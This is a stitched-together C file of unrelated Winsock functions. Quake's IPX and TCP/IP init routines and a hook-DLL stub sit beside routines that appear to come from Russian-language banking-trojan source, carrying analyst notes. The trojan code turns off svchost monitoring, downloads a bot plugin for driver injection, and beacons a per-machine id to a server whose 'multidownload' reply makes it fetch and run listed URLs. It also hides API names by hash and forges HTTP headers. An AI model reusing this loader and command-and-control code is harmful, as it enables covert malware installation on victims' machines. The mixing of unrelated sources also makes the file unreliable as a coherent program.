// ============================================================================= // Hooked functions // ============================================================================= int WINAPI MyWSAStartup(_In_ WORD wVersionRequested, _Out_ LPWSADATA lpWSAData) { int iResult; MsgBox("HookDll : Entered MyWSAStartup"); iResult = pWSAStartup(MAKEWORD(2, 2), lpWSAData); if (iResult != 0) { MsgBox("WSAStartup failed with error\n"); return 1; } else MsgBox("WSAStartup succeded"); return iResult; }
/*
 * WIPX_Init
 *
 * Brings up the Winsock IPX driver: starts Winsock 1.1 if nobody has yet,
 * clears the IPX socket table, derives a default "hostname" cvar from the
 * machine name, opens the control socket and prepares the IPX broadcast
 * address.
 *
 * Returns the control socket on success, or -1 when IPX is disabled with
 * -noipx, the Winsock function vectors are not loaded, WSAStartup fails, or
 * the control socket cannot be opened.
 */
int WIPX_Init (void)
{
    char                buff[MAXHOSTNAMELEN];
    struct qsockaddr    addr;
    struct sockaddr_ipx *bcast = (struct sockaddr_ipx *)&broadcastaddr;
    WORD                wVersionRequested;
    char                *scan;
    char                *colon;
    int                 n;
    int                 rc;

    if (COM_CheckParm ("-noipx"))
        return -1;

    /* the p* function pointers are only valid once LoadLibrary has succeeded */
    if (!winsock_lib_initialized)
        return -1;

    /* Winsock is reference counted across drivers; only the first user starts it */
    if (winsock_initialized == 0)
    {
        wVersionRequested = MAKEWORD(1, 1);
        rc = pWSAStartup (wVersionRequested, &winsockdata);
        if (rc)
        {
            Con_Printf ("Winsock initialization failed.\n");
            return -1;
        }
    }
    winsock_initialized++;

    for (n = 0; n < IPXSOCKETS; n++)
        ipxsocket[n] = 0;

    /*
     * Work out a default player name: only when the machine name can be read
     * and the quake hostname is still the placeholder "UNNAMED".
     */
    if (pgethostname(buff, MAXHOSTNAMELEN) == 0 &&
        Q_strcmp(hostname.string, "UNNAMED") == 0)
    {
        /* skip over a leading run of digits and dots (a textual IP address, roughly) */
        scan = buff;
        while (*scan && ((*scan >= '0' && *scan <= '9') || *scan == '.'))
            scan++;

        /* anything else means a real name: cut it at the first dot or at 15 characters */
        if (*scan)
        {
            n = 0;
            while (n < 15 && buff[n] != '.')
                n++;
            buff[n] = 0;
        }
        Cvar_Set ("hostname", buff);
    }

    net_controlsocket = WIPX_OpenSocket (0);
    if (net_controlsocket == -1)
    {
        Con_Printf("WIPX_Init: Unable to open control socket\n");
        /* drop our reference; the last one out shuts Winsock down */
        winsock_initialized--;
        if (winsock_initialized == 0)
            pWSACleanup ();
        return -1;
    }

    /* broadcast target: network number 0, node ff:ff:ff:ff:ff:ff, the game port */
    bcast->sa_family = AF_IPX;
    memset(bcast->sa_netnum, 0, 4);
    memset(bcast->sa_nodenum, 0xff, 6);
    bcast->sa_socket = htons((unsigned short)net_hostport);

    /*
     * Record our own address as text, minus the ":socket" suffix.
     * NOTE(review): Q_strcpy is unbounded; this relies on my_ipx_address being
     * large enough for whatever WIPX_AddrToString produces -- confirm against
     * its declaration.
     */
    WIPX_GetSocketAddr (net_controlsocket, &addr);
    Q_strcpy(my_ipx_address, WIPX_AddrToString (&addr));
    colon = Q_strrchr (my_ipx_address, ':');
    if (colon)
        *colon = 0;

    Con_Printf("Winsock IPX Initialized\n");
    ipxAvailable = true;

    return net_controlsocket;
}
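/*
 * WINS_Init
 *
 * Initialises the Winsock TCP/IP driver: loads wsock32.dll and resolves the
 * function vectors, starts Winsock 1.1 if it is not running yet, derives a
 * default "hostname" cvar from the machine name, selects the local address
 * (from "-ip <addr>" or INADDR_ANY), opens the control socket and prepares
 * the broadcast address.
 *
 * Returns the control socket on success, or -1 on any failure or when UDP is
 * disabled with -noudp. Calls Sys_Error when -ip is given without a valid
 * address.
 */
int WINS_Init(void)
{
    int i;
    char buff[MAXHOSTNAMELEN];
    char *p;
    int r;
    WORD wVersionRequested;
    HINSTANCE hInst;

    // initialize the Winsock function vectors (we do this instead of statically linking
    // so we can run on Win 3.1, where there isn't necessarily Winsock)
    // NOTE(review): the DLL is requested by bare file name, so which file gets
    // mapped depends on the loader's search order -- confirm this is acceptable
    // for the platforms still supported.
    hInst = LoadLibrary("wsock32.dll");

    if (hInst == NULL) {
        Con_SafePrintf("Failed to load winsock.dll\n");
        winsock_lib_initialized = false;
        return -1;
    }

    winsock_lib_initialized = true;

    pWSAStartup = (void *)GetProcAddress(hInst, "WSAStartup");
    pWSACleanup = (void *)GetProcAddress(hInst, "WSACleanup");
    pWSAGetLastError = (void *)GetProcAddress(hInst, "WSAGetLastError");
    psocket = (void *)GetProcAddress(hInst, "socket");
    pioctlsocket = (void *)GetProcAddress(hInst, "ioctlsocket");
    psetsockopt = (void *)GetProcAddress(hInst, "setsockopt");
    precvfrom = (void *)GetProcAddress(hInst, "recvfrom");
    psendto = (void *)GetProcAddress(hInst, "sendto");
    pclosesocket = (void *)GetProcAddress(hInst, "closesocket");
    pgethostname = (void *)GetProcAddress(hInst, "gethostname");
    pgethostbyname = (void *)GetProcAddress(hInst, "gethostbyname");
    pgethostbyaddr = (void *)GetProcAddress(hInst, "gethostbyaddr");
    pgetsockname = (void *)GetProcAddress(hInst, "getsockname");

    if (!pWSAStartup || !pWSACleanup || !pWSAGetLastError ||
        !psocket || !pioctlsocket || !psetsockopt ||
        !precvfrom || !psendto || !pclosesocket ||
        !pgethostname || !pgethostbyname || !pgethostbyaddr ||
        !pgetsockname) {
        Con_SafePrintf("Couldn't GetProcAddress from winsock.dll\n");
        // Some vectors are NULL, so the library must not be advertised as
        // usable: code that tests winsock_lib_initialized before calling
        // through a p* pointer would otherwise call a null pointer.
        winsock_lib_initialized = false;
        return -1;
    }

    if (COM_CheckParm("-noudp")) {
        return -1;
    }

    // Winsock is reference counted across drivers; only the first user starts it
    if (winsock_initialized == 0) {
        wVersionRequested = MAKEWORD(1, 1);

        r = pWSAStartup(wVersionRequested, &winsockdata);

        if (r) {
            Con_SafePrintf("Winsock initialization failed.\n");
            return -1;
        }
    }
    winsock_initialized++;

    // determine my name
    if (pgethostname(buff, MAXHOSTNAMELEN) == SOCKET_ERROR) {
        Con_DPrintf("Winsock TCP/IP Initialization failed.\n");
        if (--winsock_initialized == 0) {
            pWSACleanup();
        }
        return -1;
    }

    // if the quake hostname isn't set, set it to the machine name
    if (Q_strcmp(hostname.string, "UNNAMED") == 0) {
        // see if it's a text IP address (well, close enough)
        for (p = buff; *p; p++)
            if ((*p < '0' || *p > '9') && *p != '.') {
                break;
            }

        // if it is a real name, strip off the domain; we only want the host
        if (*p) {
            for (i = 0; i < 15; i++)
                if (buff[i] == '.') {
                    break;
                }
            buff[i] = 0;
        }
        Cvar_Set("hostname", buff);
    }

    i = COM_CheckParm("-ip");
    if (i) {
        if (i < com_argc-1) {
            myAddr = inet_addr(com_argv[i+1]);
            if (myAddr == INADDR_NONE) {
                Sys_Error("%s is not a valid IP address", com_argv[i+1]);
            }
            // NOTE(review): unbounded copy of a command-line argument. It has
            // only been checked by inet_addr(), which does not by itself bound
            // the length of the string -- confirm my_tcpip_address is large
            // enough or switch to a bounded copy where its size is visible.
            strcpy(my_tcpip_address, com_argv[i+1]);
        } else {
            Sys_Error("NET_Init: you must specify an IP address after -ip");
        }
    } else {
        myAddr = INADDR_ANY;
        strcpy(my_tcpip_address, "INADDR_ANY");
    }

    if ((net_controlsocket = WINS_OpenSocket(0)) == -1) {
        Con_Printf("WINS_Init: Unable to open control socket\n");
        // drop our reference; the last one out shuts Winsock down
        if (--winsock_initialized == 0) {
            pWSACleanup();
        }
        return -1;
    }

    // limited broadcast on the game port
    ((struct sockaddr_in *)&broadcastaddr)->sin_family = AF_INET;
    ((struct sockaddr_in *)&broadcastaddr)->sin_addr.s_addr = INADDR_BROADCAST;
    ((struct sockaddr_in *)&broadcastaddr)->sin_port = htons((unsigned short)net_hostport);

    Con_DPrintf("Winsock TCP/IP Initialized\n"); // edited
    tcpipAvailable = true;

    return net_controlsocket;
}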
// Analysis notes (code unchanged; original Russian comments translated).
//
// Routine of a loader component that fetches the plugin named by
// BotPluginName through Plugin::DownloadEx and reports the outcome through
// driver helper calls. The signature and the ThreadHandle reset at the end
// suggest it is run as a thread start routine -- confirm at the call site.
//
// Artifacts visible here that are useful for triage: the debug tag "BRDS",
// the progress markers "311_ld", "312_ld" and "313_ld" passed to
// DebugReportStepByName, and the 4-byte status string "Ok: ".
//
// Data: pointer to a USER_INIT_NOTIFY structure (PUSER_INIT_NOTIFY).
// Returns 0 on every path.
DWORD WINAPI DownloadMethod(LPVOID Data)
{
    // Plugin download routine
    PUSER_INIT_NOTIFY InitData = (PUSER_INIT_NOTIFY)Data;

    // Debug text: "Disabling monitoring of the svchost.exe process".
    // The runtime strings are left in the original language.
    LDRDBG("BRDS", "Отключаем слежение за процессом svchost.exe ");
    DriverRemoveInjectToProcess(InitData, SVChostName);

    // Winsock 2.2 start-up. Both paths leave the loop on the first pass:
    // success breaks out, failure returns; the retry delay is commented out.
    for (;;)
    {
        WSADATA wsa;
        ClearStruct(wsa);
        DWORD Code = (DWORD)pWSAStartup(MAKEWORD( 2, 2 ), &wsa);
        if (Code == 0) break;
        LDRDBG("BRDS", "pWSAStartup failed.");
        return 0;
        //pSleep(500);
    }

    // Debug text: "Starting download of the bot plugin (V 10)"
    LDRDBG("BRDS", "Запуск загрузки плагина бота (V 10) ");

    DWORD Size = 0;
    LPVOID Module = NULL;

    // Load the library
    // Debug text: "Initialising plugin download!"
    LDRDBG("BRDS", "Инициализируем загрузку плагина!");

    // 311_ld: start of downloading the plugin file from the server inside svchost
    DebugReportStepByName("311_ld");

    Module = Plugin::DownloadEx(BotPluginName, NULL, &Size, true, true, NULL);

    LDRDBG("BRDS", "DownloadEx result module=0x%u", Module);

    // 312_ld: end of downloading the plugin file from the server inside svchost
    DebugReportStepByName("312_ld");

    if (Module != NULL)
    {
        // Save the data to the cache
        // Debug text: "Bot loaded successfully". The downloaded buffer is
        // released right here; nothing in this routine hands it on.
        LDRDBG("BRDS", "Бот успешно загружен ");
        MemFree(Module);

        // pass the DLL that was read to the driver
        // add the module for injection into the task manager process

        // Notify explorer that the DLL was loaded successfully
        // Debug text: "Notifying explorer"
        LDRDBG("BRDS", "Уведомляем эксплорер ");

        // 313_ld: plugin file successfully downloaded from the server inside svchost
        DebugReportStepByName("313_ld");

        WaitExplorer();

        // The status is sent as 4 bytes taken from the address of Buf.
        PCHAR Buf = "Ok: ";
        DriverSendDataToGlobalCallBack(InitData, &Buf, 4);
    }

    ThreadHandle = NULL; // The thread handle is of no further interest

    LDRDBG("BRDS", "DownloadMethod finised.");
    return 0;
}
// Analysis notes (code unchanged).
//
// Sends an HTTP/1.0 POST to Url and acts on the reply. The request body is
// "id=" followed by the value GenerateUid() writes into Uid and then the
// global LoadExe string, which defaults to "&plugins=". If the first line of
// the reply starts with "multidownload", every "http:" entry up to the next
// '|' is passed to ExecuteFile together with a temporary file name, and the
// MD5 string of that URL plus '|' is appended to LoadExe.
//
// Network artifacts visible here: the fixed header order
// Host / User-Agent / Accept: text/html / Connection: Close / Content-Type /
// Content-Length, the "id=" body prefix and the "&plugins=" parameter.
//
// Returns true once a reply has been received and processed, false when
// Winsock start-up, URL parsing, connect, send or receive fails.
bool ReportToPlugin( char *Url )
{
    WSADATA wsa;

    if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
    {
        return false;
    }

    char *Host = NULL;
    char *Path = NULL;
    int Port = 0;

    if ( !ParseUrl1( Url, &Host, &Path, &Port ) )
    {
        return false;
    }

    // NOTE(review): presumably a per-installation identifier -- GenerateUid is
    // not shown here.
    char Uid[100];
    GenerateUid( Uid );

    // The formatting routine is looked up by a numeric identifier rather than
    // by name. NOTE(review): judging by the typedef this is wsprintfA resolved
    // through a name hash, which keeps the API name out of the binary's
    // strings and import table -- confirm against GetProcAddressEx.
    typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
    fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );

    // User-Agent is taken from pObtainUserAgentString, with "-" as the
    // fallback when the 1024-byte allocation returned NULL.
    char *UserAgent = NULL;
    UserAgent = (char*)MemAlloc( 1024 );
    DWORD dwUserSize = 1024;

    pObtainUserAgentString( 0, UserAgent, &dwUserSize );
    if ( UserAgent == NULL )
    {
        MemFree( UserAgent );
        UserAgent = "-";
    }

    char Request[] = "POST %s HTTP/1.0\r\n"
                     "Host: %s\r\n"
                     "User-Agent: %s\r\n"
                     "Accept: text/html\r\n"
                     "Connection: Close\r\n"
                     "Content-Type: application/x-www-form-urlencoded\r\n"
                     "Content-Length: %d\r\n\r\n";

    char Args[] = "id=";

    char *HttpPacket = NULL;
    HttpPacket = (char*)MemAlloc( 2048 );

    // Content-Length = len("id=") + len(Uid) + len(LoadExe); 9 is the length
    // of the default "&plugins=" used when LoadExe has not been set yet.
    int iTmp;
    if (LoadExe!=NULL)
    {
        iTmp=m_lstrlen(LoadExe);
    }else iTmp=9;

    pwsprintfA( HttpPacket, Request, Path, Host, UserAgent, m_lstrlen( Args ) + m_lstrlen( Uid )+iTmp );

    m_lstrcat( HttpPacket, Args );
    m_lstrcat( HttpPacket, Uid );

    // First use: create LoadExe holding the bare parameter name.
    if (LoadExe==NULL)
    {
        LoadExe = (char*)MemAlloc(10);
        m_lstrncpy(LoadExe,"&plugins=",9);
        LoadExe[9]='\0';
    }
    m_lstrcat( HttpPacket, LoadExe );

    SOCKET Socket = MyConnect1( Host, Port );

    if( Socket == -1 )
    {
        return false;
    }

    bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) );

    MemFree( HttpPacket );

    if ( !b )
    {
        return false;
    }

    DWORD dwSize = 0;

    char *Buffer = RecvAndParse( Socket, &dwSize );

    if ( !Buffer )
    {
        pclosesocket( Socket );
        return false;
    }

    // The command keyword is assembled from single characters, so it does not
    // appear as one contiguous string literal in the source.
    char MultiDownloadCommand[]={'m','u','l','t','i','d','o','w','n','l','o','a','d',0};

    // Tokenise the reply on CR/LF and compare the start of Buffer with the
    // command keyword.
    char *Context;
    m_strtok_s( Buffer, "\r\n", &Context );

    if ( !m_lstrncmp( Buffer, MultiDownloadCommand, m_lstrlen( MultiDownloadCommand ) ) )
    {
        char * cPointer= m_strstr(&Buffer[1],"http:");

        char* cUrl=Buffer;
        char* cUrlNext;
        int i;
        char *DownloadUrl;

        // One iteration per "http:" occurrence; each entry runs up to the
        // next '|'.
        while (true)
        {
            cUrl= m_strstr(&cUrl[1],"http:");
            if (cUrl==NULL)break;
            cUrlNext= m_strstr(cUrl,"|");
            i=m_lstrlen(cUrl)-m_lstrlen(cUrlNext);
            DownloadUrl = (char*)MemAlloc(i)+1;
            m_lstrncpy(DownloadUrl,cUrl,i);
            DownloadUrl[i]='\0';

            if ( DownloadUrl )
            {
                // Record the MD5 string of the URL (plus '|') in LoadExe, so
                // it is included in the body of later reports.
                LoadExe=(char*)MemRealloc(LoadExe,33+m_lstrlen(LoadExe)+1);
                m_lstrcat( LoadExe, MD5StrFromBuf(DownloadUrl, STRA::Length(DownloadUrl)).t_str());
                m_lstrcat( LoadExe, "|");

                // NOTE(review): ExecuteFile is not shown; from its name and
                // arguments it presumably fetches the URL into the temporary
                // file and runs it -- confirm.
                WCHAR *FileName =(WCHAR *)GetTempName();

                if ( FileName && DownloadUrl )
                {
                    ExecuteFile( DownloadUrl, FileName );
                }

                MemFree( FileName );
            }

            MemFree( DownloadUrl );
        }
    }

    MemFree( Buffer );

    pclosesocket( Socket );

    return true;
}
// Analysis notes (code unchanged).
//
// Fetches Url with a hand-built HTTP/1.1 GET over a raw socket and hands the
// buffer returned by RecvAndParse to the caller.
//
// Network artifacts visible here, useful for signatures because they differ
// from what a browser sends: a space before CRLF on several header lines, a
// stray space after the Accept line's CRLF, the fixed headers
// "Accept-Language: ru" and "UA-CPU: x86", "Connection: Close", and three
// CRLF pairs at the end of the request.
//
// Url:      address to fetch; the port defaults to 80 before ParseUrl runs.
// lpBuffer: receives the response buffer on success.
// dwSize:   receives its size; when this pointer is NULL the function
//           returns false even though data was received.
// Returns true only when a buffer was received and dwSize is non-NULL.
bool AsyncDownload1( char *Url, LPBYTE *lpBuffer, LPDWORD dwSize )
{
    WSADATA wsa;

    if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
    {
        return false;
    }

    char *Host = NULL;
    char *Path = NULL;
    int Port = 80;

    if ( !ParseUrl( Url, &Host, &Path, &Port ) )
    {
        return false;
    }

    SOCKET Socket = MyConnect( Host, Port );

    if( Socket == -1 )
    {
        return false;
    }

    // User-Agent string comes from pObtainUserAgentString (1024-byte buffer).
    char *UserAgent = NULL;
    UserAgent = (char*)MemAlloc( 1024 );
    DWORD dwUserSize = 1024;

    pObtainUserAgentString( 0, UserAgent, &dwUserSize );

    // The request is concatenated piece by piece into a 2048-byte buffer.
    char *query=(char*)MemAlloc(2048);
    m_lstrcpy(query,"GET /");
    m_lstrcat(query,Path);
    m_lstrcat(query," HTTP/1.1\r\nAccept: */* \r\n ");
    m_lstrcat(query,"Accept-Language: ru \r\n");
    m_lstrcat(query,"UA-CPU: x86 \r\n");
    m_lstrcat(query,"Accept-Encoding: gzip, deflate \r\n");
    m_lstrcat(query,"User-Agent: ");
    m_lstrcat(query,UserAgent);
    m_lstrcat(query,"\r\nHost: ");
    m_lstrcat(query,Host);
    m_lstrcat(query,"\r\nConnection: Close\r\n\r\n\r\n");

    bool b = MySend( Socket, (const char *)query, m_lstrlen( query ) );

    // Path is intentionally not released here (the call is commented out).
    MemFree( Host );
    //MemFree( Path );
    MemFree( UserAgent );
    MemFree( query );

    if ( !b )
    {
        return false;
    }

    DWORD dwSizeFile = 0;

    // NOTE(review): RecvAndParse is not shown; presumably it reads the reply
    // and returns the body with its length in dwSizeFile -- confirm.
    char *Buffer = RecvAndParse( Socket, &dwSizeFile );

    if ( !Buffer )
    {
        pclosesocket( Socket );
        return false;
    }

    // Ownership of Buffer passes to the caller through lpBuffer.
    if ( dwSize )
    {
        *lpBuffer = (LPBYTE)Buffer;
        *dwSize = dwSizeFile;

        return true;
    }

    return false;
}
// Analysis notes (code unchanged).
//
// Sends an HTTP/1.0 GET for Url over a raw socket and returns whatever
// RecvAndParse produces for the reply.
//
// Network artifacts visible here: request line "GET <path> HTTP/1.0" followed
// by exactly Host, User-Agent and "Connection: close" (lower-case "close",
// unlike the "Connection: Close" used by the sibling request builders on this
// page).
//
// Returns the response buffer (released by the caller, presumably with
// MemFree), or a null pointer on failure; the early exits spell that as
// `false`, the later ones as NULL.
char *GetInfoFromBcServer( char *Url )
{
    WSADATA wsa;

    if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
    {
        return false;
    }

    char *Host = NULL;
    char *Path = NULL;
    int Port = 0;

    if ( !ParseUrl( Url, &Host, &Path, &Port ) )
    {
        return false;
    }

    // The formatting routine is looked up by a numeric identifier rather than
    // by name. NOTE(review): judging by the typedef this is wsprintfA resolved
    // through a name hash -- confirm against GetProcAddressEx.
    typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
    fwsprintfA _pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );

    char Request[] = "GET %s HTTP/1.0\r\n"
                     "Host: %s\r\n"
                     "User-Agent: %s\r\n"
                     "Connection: close\r\n\r\n";

    char *HttpPacket = (char*)MemAlloc( 1024 );

    if ( HttpPacket == NULL )
    {
        return false;
    }

    // User-Agent string comes from pObtainUserAgentString (1024-byte buffer).
    char *UserAgent = (char*)MemAlloc( 1024 );
    DWORD dwUserSize = 1024;

    pObtainUserAgentString( 0, UserAgent, &dwUserSize );

    // Path, Host and the User-Agent string are formatted into the 1024-byte
    // request buffer.
    _pwsprintfA( HttpPacket, Request, Path, Host, UserAgent );

    SOCKET Socket = MyConnect( Host, Port );

    if ( Socket == INVALID_SOCKET )
    {
        MemFree( HttpPacket );
        return NULL;
    }

    bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) );

    MemFree( HttpPacket );

    if ( !b )
    {
        return NULL;
    }

    DWORD dwSize = 0;

    // NOTE(review): RecvAndParse is not shown; presumably it reads the reply
    // and returns the body -- confirm.
    char *Buffer = RecvAndParse( Socket, &dwSize );

    pclosesocket( Socket );

    return Buffer;
}
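/*
 * WINS_Init
 *
 * Initialises the Winsock TCP/IP driver: loads wsock32.dll and resolves the
 * function vectors, starts Winsock 1.1 if it is not running yet, looks up the
 * local host to learn our address and a default "hostname" cvar, opens the
 * control socket and prepares the broadcast address.
 *
 * Returns the control socket on success, or -1 on any failure or when UDP is
 * disabled with -noudp.
 */
int WINS_Init (void)
{
    int     i;
    struct hostent *local = NULL;
    char    buff[MAXHOSTNAMELEN];
    struct qsockaddr addr;
    char    *p;
    int     r;
    WORD    wVersionRequested;

    // initialize the Winsock function vectors (we do this instead of statically linking
    // so we can run on Win 3.1, where there isn't necessarily Winsock)
    // NOTE(review): the DLL is requested by bare file name, so which file gets
    // mapped depends on the loader's search order -- confirm this is acceptable
    // for the platforms still supported.
    hInst = LoadLibrary("wsock32.dll");

    if (hInst == NULL)
    {
        Con_SafePrintf ("Failed to load winsock.dll\n");
        winsock_lib_initialized = false;
        return -1;
    }

    winsock_lib_initialized = true;

    pWSAStartup = (void *)GetProcAddress(hInst, "WSAStartup");
    pWSACleanup = (void *)GetProcAddress(hInst, "WSACleanup");
    pWSAGetLastError = (void *)GetProcAddress(hInst, "WSAGetLastError");
    psocket = (void *)GetProcAddress(hInst, "socket");
    pioctlsocket = (void *)GetProcAddress(hInst, "ioctlsocket");
    psetsockopt = (void *)GetProcAddress(hInst, "setsockopt");
    precvfrom = (void *)GetProcAddress(hInst, "recvfrom");
    psendto = (void *)GetProcAddress(hInst, "sendto");
    pclosesocket = (void *)GetProcAddress(hInst, "closesocket");
    pgethostname = (void *)GetProcAddress(hInst, "gethostname");
    pgethostbyname = (void *)GetProcAddress(hInst, "gethostbyname");
    pgethostbyaddr = (void *)GetProcAddress(hInst, "gethostbyaddr");
    pgetsockname = (void *)GetProcAddress(hInst, "getsockname");

    if (!pWSAStartup || !pWSACleanup || !pWSAGetLastError ||
        !psocket || !pioctlsocket || !psetsockopt ||
        !precvfrom || !psendto || !pclosesocket ||
        !pgethostname || !pgethostbyname || !pgethostbyaddr ||
        !pgetsockname)
    {
        Con_SafePrintf ("Couldn't GetProcAddress from winsock.dll\n");
        // Some vectors are NULL, so the library must not be advertised as
        // usable: code that tests winsock_lib_initialized before calling
        // through a p* pointer would otherwise call a null pointer.
        winsock_lib_initialized = false;
        return -1;
    }

    if (COM_CheckParm ("-noudp"))
        return -1;

    // Winsock is reference counted across drivers; only the first user starts it
    if (winsock_initialized == 0)
    {
        wVersionRequested = MAKEWORD(1, 1);

        r = pWSAStartup (wVersionRequested, &winsockdata);

        if (r)
        {
            Con_SafePrintf ("Winsock initialization failed.\n");
            return -1;
        }
    }
    winsock_initialized++;

    // determine my name & address
    if (pgethostname(buff, MAXHOSTNAMELEN) == 0)
    {
        // the lookup runs with a blocking hook installed and blocktime set
        // just before it; a NULL result is reported as a timeout
        blocktime = Sys_FloatTime();
        WSASetBlockingHook(BlockingHook);
        local = pgethostbyname(buff);
        WSAUnhookBlockingHook();
        if (local == NULL)
        {
            Con_DPrintf ("Winsock TCP/IP Initialization timed out.\n");
            if (--winsock_initialized == 0)
                pWSACleanup ();
            return -1;
        }
    }

    if (local)
    {
        // first address of the host entry, read as a 4-byte value
        // NOTE(review): assumes an IPv4 entry and a suitably aligned buffer
        myAddr = *(int *)local->h_addr_list[0];

        // if the quake hostname isn't set, set it to the machine name
        if (strcmp(hostname.string, "UNNAMED") == 0)
        {
            // see if it's a text IP address (well, close enough)
            for (p = buff; *p; p++)
                if ((*p < '0' || *p > '9') && *p != '.')
                    break;

            // if it is a real name, strip off the domain; we only want the host
            if (*p)
            {
                for (i = 0; i < 15; i++)
                    if (buff[i] == '.')
                        break;
                buff[i] = 0;
            }
            Cvar_Set ("hostname", buff);
        }
    }

    if ((net_controlsocket = WINS_OpenSocket (0)) == -1)
    {
        Con_Printf("WINS_Init: Unable to open control socket\n");
        // drop our reference; the last one out shuts Winsock down
        if (--winsock_initialized == 0)
            pWSACleanup ();
        return -1;
    }

    // limited broadcast on the game port
    ((struct sockaddr_in *)&broadcastaddr)->sin_family = AF_INET;
    ((struct sockaddr_in *)&broadcastaddr)->sin_addr.s_addr = INADDR_BROADCAST;
    ((struct sockaddr_in *)&broadcastaddr)->sin_port = htons((unsigned short)net_hostport);

    // Record our own address as text, minus the ":port" suffix.
    // NOTE(review): strcpy is unbounded; this relies on my_tcpip_address being
    // large enough for whatever WINS_AddrToString produces -- confirm against
    // its declaration.
    WINS_GetSocketAddr (net_controlsocket, &addr);
    strcpy(my_tcpip_address, WINS_AddrToString (&addr));
    p = strrchr (my_tcpip_address, ':');
    if (p)
        *p = 0;

    Con_Printf("Winsock TCP/IP Initialized\n");
    tcpipAvailable = true;

    return net_controlsocket;
}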